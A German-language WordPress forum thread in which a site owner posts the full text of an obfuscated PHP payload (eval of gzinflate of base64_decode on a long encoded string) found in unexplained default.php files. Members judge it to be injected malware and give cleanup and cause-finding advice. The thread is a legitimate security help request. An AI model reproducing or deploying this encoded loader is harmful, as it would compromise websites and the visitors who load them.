1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Ist das ein "Schadcode"?

Dieses Thema im Forum "Konfiguration" wurde erstellt von Lisa4www, 5. Februar 2013.

  1. Lisa4www

    Lisa4www Member

    Registriert seit:
    9. Januar 2013
    Beiträge:
    6
    Zustimmungen:
    0
    Sehr geehrte Wordpress Expeten,
    ist das ein Schadcode, ist in default.php Dateien, die ich nicht angelegt habe.
    Ich habe Decoder versucht ohne Erfolg. Offline gescannt, kein Ergebnis.
    FTP Log Dateien kein Hinweis auf fremde Zugriffe:
    Wenn es aus der DB kommen würde, wie durchsucht man diese? wo nach?
    Auf das tmp verzeichnis beim Hoster habe ich keinen Zugriff!

    <?php eval(gzinflate(base64_decode("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"))); ?>

    Besten Dank für Hinweise
    Lisa
     
    #1 Lisa4www, 5. Februar 2013
  2. SirEctor

    SirEctor Well-Known Member
    Ehrenmitglied

    Registriert seit:
    28. Oktober 2008
    Beiträge:
    12.361
    Zustimmungen:
    427
    Ich würde erstmal davon ausgehen, dass es Schadcode ist, denn eine default.php gibt es bei Wordpress nicht.
     
    #2 SirEctor, 5. Februar 2013
  3. Lisa4www

    Lisa4www Member

    Registriert seit:
    9. Januar 2013
    Beiträge:
    6
    Zustimmungen:
    0
    Danke, habe ich mir gedacht, wenn ich die default.php lösche, sind diese flugs wieder da. Stelle ich den CHMOD auf 404 bleiben sie leer. Mich würde interessieren, wie die reinkommen. Neu installiert, das selbe Spiel!
     
    #3 Lisa4www, 5. Februar 2013
  4. mfitzen

    mfitzen Well-Known Member

    Registriert seit:
    9. Juli 2006
    Beiträge:
    9.820
    Zustimmungen:
    2
    Scheint aktuell sehr beliebt zu sein... Wie SirEctor schon sagte, gibt es die default.php nicht im WP Download. Diese wurde vom Angreifer angelegt. Zusätzlich dürften diverse Javascriptdateien in der kompletten Installation befallen sein. Du müsstest auch etliche .htaccess Dateien auf dem Webspace finden. Ich habe das die Tage für einen anderen User mal bereinigt, was schon etwas aufwändiger war. Der Schadcode kann überall hinterlassen worden sein, von daher reicht das löschen der default.php nicht. Du solltest Dir über die Jobbörse professionelle Hilfe besorgen, die nicht nur die Installation bereinigt, sondern auch die Sicherheitslücke finden kann. Oft liegt es an veralteten Installationen / Plugins / Themes, unsicheren Zugangsdaten oder abgegriffenen FTP Zugangsdaten (zum Beispiel bei Nutzung des FTP Clients Filezilla u. dessen Passwortmanager in Verbindung mit einem infizierten PC). Genauere Ursache bringt hier wohl nur ein Blick in die Logfiles. Wenn Du Dir professionellen Hilfe nicht leisten kannst/willst, dann solltest Du in Betracht ziehen, alles neu aufzusetzen.

    Wichtig ist in jedem Fall die infizierten Seiten unverzüglich zu sperren, damit sich nicht noch mehr User irgendwas einfangen
     
    #4 mfitzen, 5. Februar 2013
  5. codestyling

    codestyling WPD-Team

    Registriert seit:
    30. März 2008
    Beiträge:
    1.904
    Zustimmungen:
    0
    #5 codestyling, 5. Februar 2013
(Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können. )
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Akzeptieren Weitere Informationen...
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Akzeptieren Weitere Informationen...
    Information ausblenden